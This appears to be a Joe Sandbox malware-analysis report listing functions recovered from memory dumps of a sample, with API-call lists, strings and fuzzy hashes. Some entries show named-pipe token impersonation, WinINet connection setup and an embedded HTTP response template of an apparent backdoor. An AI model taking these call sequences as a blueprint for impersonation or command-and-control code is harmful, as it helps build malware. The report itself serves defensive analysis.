Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountTickioctlsocket
String ID:
API String ID: 3686034022-0
Opcode ID: df8b12fdec247861816a65c7895da2fd6f05e4dcf0f4f0871b067a3fd8febfec
Instruction ID: 440b09ed9c3a9c1bc2eca7d26a77a29dc03c3c475be8c925420ed1ea4085cf84
Opcode Fuzzy Hash: df8b12fdec247861816a65c7895da2fd6f05e4dcf0f4f0871b067a3fd8febfec
Instruction Fuzzy Hash: 0B114C32304A8047E750DB6BECC0359B324E789BE4F540136DA9987AA4CFBCC989C705

Uniqueness

Uniqueness Score: -1.00%

Function 03A6FDAC Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03A6FDD2
ConnectNamedPipe.KERNEL32 ref: 03A6FDE8
ReadFile.KERNEL32 ref: 03A6FE12
ImpersonateNamedPipeClient.ADVAPI32 ref: 03A6FE23
GetCurrentThread.KERNEL32 ref: 03A6FE2D
OpenThreadToken.ADVAPI32 ref: 03A6FE45
DisconnectNamedPipe.KERNEL32 ref: 03A6FE5B

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
String ID:
API String ID: 4232080776-0
Opcode ID: 63d816b5d70ed7ced87649dbe768fda66f973ffc67f04252ce0421f3c604c356
Instruction ID: 0ebe95a450737ad9b5561eb2d300930e836f64fcd541d1d33b8f331af669a66a
Opcode Fuzzy Hash: 63d816b5d70ed7ced87649dbe768fda66f973ffc67f04252ce0421f3c604c356
Instruction Fuzzy Hash: C911A336321A44C6FB61DB21FC447697379FB95B84F84051789DA86665CF3CC248D713

Uniqueness

Uniqueness Score: -1.00%

Function 0048DFB0 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 170stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0048DFC3

Part of subcall function 0048CEE0: memcpy.MSVCRT ref: 0048CF78
Part of subcall function 0048CEE0: memcpy.MSVCRT ref: 0048CF9A

Strings

basic_string::replace, xrefs: 0048DFEF, 0048E03F, 0048E083, 0048E0F8
basic_string::insert, xrefs: 0048E0D2, 0048E143
basic_string::replace, xrefs: 0048E186
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0048E179
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0048DFF9, 0048E032, 0048E076, 0048E0DF, 0048E0EB, 0048E136

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memcpy$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace$basic_string::replace
API String ID: 2619041689-3350440205
Opcode ID: e927ad9da61506e59b5ccaf32c658bd64bd70624bd10694917f49098488d9f26
Instruction ID: ffcf56bd079866fd0ed2343fb52aaa9d3579bc263404905a984d71701d8b3a6e
Opcode Fuzzy Hash: e927ad9da61506e59b5ccaf32c658bd64bd70624bd10694917f49098488d9f26
Instruction Fuzzy Hash: 5D41D6A6751A8491DA20EB6BEC01BCE6320F756FC8F845527AE0C17721EB7CC656C708

Uniqueness

Uniqueness Score: -1.00%

Function 00490810 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 168COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00490823

Part of subcall function 0048F8B0: memcpy.MSVCRT ref: 0048F949
Part of subcall function 0048F8B0: memcpy.MSVCRT ref: 0048F96C

Strings

basic_string::replace, xrefs: 0049084F, 0049089F, 004908E3, 00490956
basic_string::replace, xrefs: 004909EC
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 004909DF
basic_string::insert, xrefs: 00490933, 004909A3
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00490859, 00490892, 004908D6, 0049093D, 00490949, 00490996

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memcpy$wcslen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace$basic_string::replace
API String ID: 1844840824-3350440205
Opcode ID: ccfbee8870f9b48e3648f643a54b265da9ea59903e295df68d28bc0a16db9ee0
Instruction ID: 84a7ff4c7b3e297d2087a956400e36b746f17d9225ba96110f03517120bdc386
Opcode Fuzzy Hash: ccfbee8870f9b48e3648f643a54b265da9ea59903e295df68d28bc0a16db9ee0
Instruction Fuzzy Hash: C04108D2B11A8481EA10AB6AEC01BCE6720F356FD8F8455279F4C17725EF2CC655C708

Uniqueness

Uniqueness Score: -1.00%

Function 03A7EA50 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A7EA8C

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

_invalid_parameter_noinfo.LIBCMT ref: 03A7EA97
memcpy_s.LIBCMT ref: 03A7EB5C
_fileno.LIBCMT ref: 03A7EBC7
_filbuf.LIBCMT ref: 03A7EBF5
_errno.LIBCMT ref: 03A7EC45

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
Instruction ID: 942421ba3932cd75ae6d3b9b3e03d8701b6785aef80e45b246836495252681a5
Opcode Fuzzy Hash: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
Instruction Fuzzy Hash: FF515A7570535042DB18CB669D88E6ABBA0B794BF4F1C876BAE7947FD4CB34C0918780

Uniqueness

Uniqueness Score: -1.00%

Function 0045E620 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

basic_string::insert, xrefs: 0045E86F, 0045E87B
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0045E885

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert
API String ID: 0-684465245
Opcode ID: 5b89e2165160ddf825d509ddb143d760669da90b17e4c8c6538d7885e6f80edd
Instruction ID: 52a9b31ef3007e168f093e6e01c47db188c78afe55715ee6c4b7de7e5552fee9
Opcode Fuzzy Hash: 5b89e2165160ddf825d509ddb143d760669da90b17e4c8c6538d7885e6f80edd
Instruction Fuzzy Hash: 1341567731169890CA08AF1BD9105BD6311A318FD5B884927EF1D07757FA2CC78AD30D

Uniqueness

Uniqueness Score: -1.00%

Function 00466A40 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string::insert, xrefs: 00466BAE, 00466BBA
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00466BC4

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert
API String ID: 0-684465245
Opcode ID: ee3b105f7e3555e6800ce911a26d5939c28188c414e23eaa767a4b341c0dbd4b
Instruction ID: e2e4774b1235f9f1478b1ce839c2d3130b70540aeff38988ed57affad81ac2ce
Opcode Fuzzy Hash: ee3b105f7e3555e6800ce911a26d5939c28188c414e23eaa767a4b341c0dbd4b
Instruction Fuzzy Hash: B03137A27116E888CA016FABD5206AD27145313FC8F9D8133DF0A6B742F92CD682D34B

Uniqueness

Uniqueness Score: -1.00%

Function 03A88208 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 03A88235

Part of subcall function 03A81D0C: _FF_MSGBANNER.LIBCMT ref: 03A81D29
Part of subcall function 03A81D0C: _NMSG_WRITE.LIBCMT ref: 03A81D33

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 03A882B8
EnterCriticalSection.KERNEL32 ref: 03A882D4
LeaveCriticalSection.KERNEL32 ref: 03A882E4
_calloc_crt.LIBCMT ref: 03A8835A
__lock_fhandle.LIBCMT ref: 03A883C2

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
String ID:
API String ID: 445582508-0
Opcode ID: cb94c47234e7318eaf63806fd4c7d2241f139b70922057cc91e94235dbb42d3c
Instruction ID: c8bb36fefc3826f585407cb1cf720d0eb8956944f53bc134d7fc2ca535737d6a
Opcode Fuzzy Hash: cb94c47234e7318eaf63806fd4c7d2241f139b70922057cc91e94235dbb42d3c
Instruction Fuzzy Hash: D451DE32600B8082DB14EF25D84432EB7ADFB84B98F89552ACE9E477A4DF7CC852C701

Uniqueness

Uniqueness Score: -1.00%

Function 03A7098C Relevance: 9.1, APIs: 6, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 03A7473C: malloc.LIBCMT ref: 03A74758

Part of subcall function 03A7E560: _errno.LIBCMT ref: 03A7E4B7
Part of subcall function 03A7E560: _invalid_parameter_noinfo.LIBCMT ref: 03A7E4C2

fseek.LIBCMT ref: 03A70A28

Part of subcall function 03A7EDE4: _errno.LIBCMT ref: 03A7EE0C
Part of subcall function 03A7EDE4: _invalid_parameter_noinfo.LIBCMT ref: 03A7EE17

_ftelli64.LIBCMT ref: 03A70A30

Part of subcall function 03A7EE58: _errno.LIBCMT ref: 03A7EE76
Part of subcall function 03A7EE58: _invalid_parameter_noinfo.LIBCMT ref: 03A7EE81

fseek.LIBCMT ref: 03A70A40

Part of subcall function 03A7EDE4: _fseek_nolock.LIBCMT ref: 03A7EE35

GetFullPathNameA.KERNEL32 ref: 03A70A63
malloc.LIBCMT ref: 03A70A80

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

Part of subcall function 03A6CFCC: malloc.LIBCMT ref: 03A6CFDF

Part of subcall function 03A6CFFC: htonl.WS2_32 ref: 03A6D007

fclose.LIBCMT ref: 03A70B3D

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
String ID:
API String ID: 3587854850-0
Opcode ID: a569d82a0c52b606fced7d3ca32dedd0a036ca5e6a97fc9ef12d49b38375e880
Instruction ID: 12c25e334fe4307a5517639d0409a14284c00786a174af94b3cfb5f4e50ee552
Opcode Fuzzy Hash: a569d82a0c52b606fced7d3ca32dedd0a036ca5e6a97fc9ef12d49b38375e880
Instruction Fuzzy Hash: DE41A22A31479082DB14EB22E99876EA355F7C9BD4F408127DE5E5BB98DF38C606CB01

Uniqueness

Uniqueness Score: -1.00%

Function 03A743B0 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 03A743C8
GetOEMCP.KERNEL32 ref: 03A743D2
GetCurrentProcessId.KERNEL32 ref: 03A743F8
GetTickCount.KERNEL32 ref: 03A74400

Part of subcall function 03A7E38C: _getptd.LIBCMT ref: 03A7E394

GetCurrentProcess.KERNEL32 ref: 03A7443C

Part of subcall function 03A6FF70: GetModuleHandleA.KERNEL32 ref: 03A6FF85
Part of subcall function 03A6FF70: GetProcAddress.KERNEL32 ref: 03A6FF95

GetCurrentProcessId.KERNEL32 ref: 03A744AE

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
String ID:
API String ID: 3426420785-0
Opcode ID: b6fc155a55da666bb393d8027138b05ac493bc84460806fdbb4add4f73d2445a
Instruction ID: bf2786a10e2bd1142a071f277b82ef712801273345958cc5503da079effe799f
Opcode Fuzzy Hash: b6fc155a55da666bb393d8027138b05ac493bc84460806fdbb4add4f73d2445a
Instruction Fuzzy Hash: A741D26A71071099EF01EBB2DD9479E73A8BF89794F404027CE495BB68EF38C10AC711

Uniqueness

Uniqueness Score: -1.00%

Function 03A6E724 Relevance: 9.1, APIs: 6, Instructions: 108networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03A7C09C: RevertToSelf.ADVAPI32 ref: 03A7C0AA

InternetOpenA.WININET ref: 03A6E7E1
InternetSetOptionA.WININET ref: 03A6E801
InternetSetOptionA.WININET ref: 03A6E819
InternetConnectA.WININET ref: 03A6E84F
InternetSetOptionA.WININET ref: 03A6E88C
InternetSetOptionA.WININET ref: 03A6E8B7

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: Internet$Option$ConnectOpenRevertSelf
String ID:
API String ID: 1513466045-0
Opcode ID: dad49d787d011debb01431b698db0f5525ed4c0c9550348a44d35d6a50f0dafd
Instruction ID: 7afb95f79e675a039b3fd399828420b0bc29ed172290afd9bafa2291b167bf19
Opcode Fuzzy Hash: dad49d787d011debb01431b698db0f5525ed4c0c9550348a44d35d6a50f0dafd
Instruction Fuzzy Hash: 6141D87A301B4182EB25DF55F994B6977A9F786B84F08501FCA891BB64DF7CC206CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0367D9A7 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0367D8FE

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

_invalid_parameter_noinfo.LIBCMT ref: 0367D909
_getstream.LIBCMT ref: 0367D929
_errno.LIBCMT ref: 0367D93B
_errno.LIBCMT ref: 0367D94D
_openfile.LIBCMT ref: 0367D97B

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
Instruction ID: b8dbced6ebf7fe0ed239ee089769e967ae4ca1ed0a57c59c69753931283b0d8b
Opcode Fuzzy Hash: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
Instruction Fuzzy Hash: 7D21A434618B4A4FE795FB3C941432A76D1EF89210F540A6E9449CB360EF74C8428796

Uniqueness

Uniqueness Score: -1.00%

Function 03A7E560 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A7E4B7

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

_invalid_parameter_noinfo.LIBCMT ref: 03A7E4C2
_getstream.LIBCMT ref: 03A7E4E2
_errno.LIBCMT ref: 03A7E4F4
_errno.LIBCMT ref: 03A7E506
_openfile.LIBCMT ref: 03A7E534

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: b28fd23009c431afd31368ed49de371f4cc8ea00af4fe5c0ad9afbaa5be06d71
Instruction ID: 3ffd41898dd2435276e49d2f16298da46ad3b7744b42b25a93691bc05fca9107
Opcode Fuzzy Hash: b28fd23009c431afd31368ed49de371f4cc8ea00af4fe5c0ad9afbaa5be06d71
Instruction Fuzzy Hash: 4511087631478685EB11EB72AD4071EB7E4BB99BC0F4854679E898BB54EF7CC1018700

Uniqueness

Uniqueness Score: -1.00%

Function 03A6F89C Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A6F8BD

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

free.LIBCMT ref: 03A6F8F8
fwrite.LIBCMT ref: 03A6F939
fclose.LIBCMT ref: 03A6F941
free.LIBCMT ref: 03A6F94E

Part of subcall function 03A7D188: HeapFree.KERNEL32 ref: 03A7D19E
Part of subcall function 03A7D188: _errno.LIBCMT ref: 03A7D1A8
Part of subcall function 03A7D188: GetLastError.KERNEL32 ref: 03A7D1B0

GetLastError.KERNEL32 ref: 03A6F953

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
String ID:
API String ID: 1616846154-0
Opcode ID: 55f7a226863731569709ab65466cf2251e8dcd047762f84c6fb73987460c01ea
Instruction ID: b5d62f959d62235dbac12a2d5232c30763080d7d5d8b08ee9e004b779cc9d24b
Opcode Fuzzy Hash: 55f7a226863731569709ab65466cf2251e8dcd047762f84c6fb73987460c01ea
Instruction Fuzzy Hash: 1411AB2530478055DA10E713BA9426EA351EBCAFE4F884627DE6D5FB88DE2CC5018740

Uniqueness

Uniqueness Score: -1.00%

Function 03A72DB0 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03A72DCE
WaitNamedPipeA.KERNEL32 ref: 03A72DE3
CreateFileA.KERNEL32 ref: 03A72E0D
SetNamedPipeHandleState.KERNEL32 ref: 03A72E2F
DisconnectNamedPipe.KERNEL32 ref: 03A72E3C
SetLastError.KERNEL32 ref: 03A72E51

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
String ID:
API String ID: 3798860377-0
Opcode ID: 72c7b950336cc460e27c7b46ba728849a6f7e565e48342ed7c09114a024cd772
Instruction ID: 11d3ab5e4ce36ad8083dba1ff2d9ad9fa474676c4488fa9634d7f491873bded7
Opcode Fuzzy Hash: 72c7b950336cc460e27c7b46ba728849a6f7e565e48342ed7c09114a024cd772
Instruction Fuzzy Hash: 6C11063232469083F710CB25F99872E7765F788FE8F444626EAAA57B98CF7CC5458702

Uniqueness

Uniqueness Score: -1.00%

Function 03A7CF70 Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A7CF93

Part of subcall function 03A7D1C8: _FF_MSGBANNER.LIBCMT ref: 03A7D1F8
Part of subcall function 03A7D1C8: _NMSG_WRITE.LIBCMT ref: 03A7D202
Part of subcall function 03A7D1C8: HeapAlloc.KERNEL32 ref: 03A7D21D
Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D236
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D241
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D24C

malloc.LIBCMT ref: 03A7CFA1

Part of subcall function 03A7D1C8: _callnewh.LIBCMT ref: 03A7D25C
Part of subcall function 03A7D1C8: _errno.LIBCMT ref: 03A7D261

malloc.LIBCMT ref: 03A7CFC3
_snprintf.LIBCMT ref: 03A7CFDE

Part of subcall function 03A7D57C: _errno.LIBCMT ref: 03A7D5B3
Part of subcall function 03A7D57C: _invalid_parameter_noinfo.LIBCMT ref: 03A7D5BE

malloc.LIBCMT ref: 03A7CFF9

Strings

HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 03A7CFC8

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
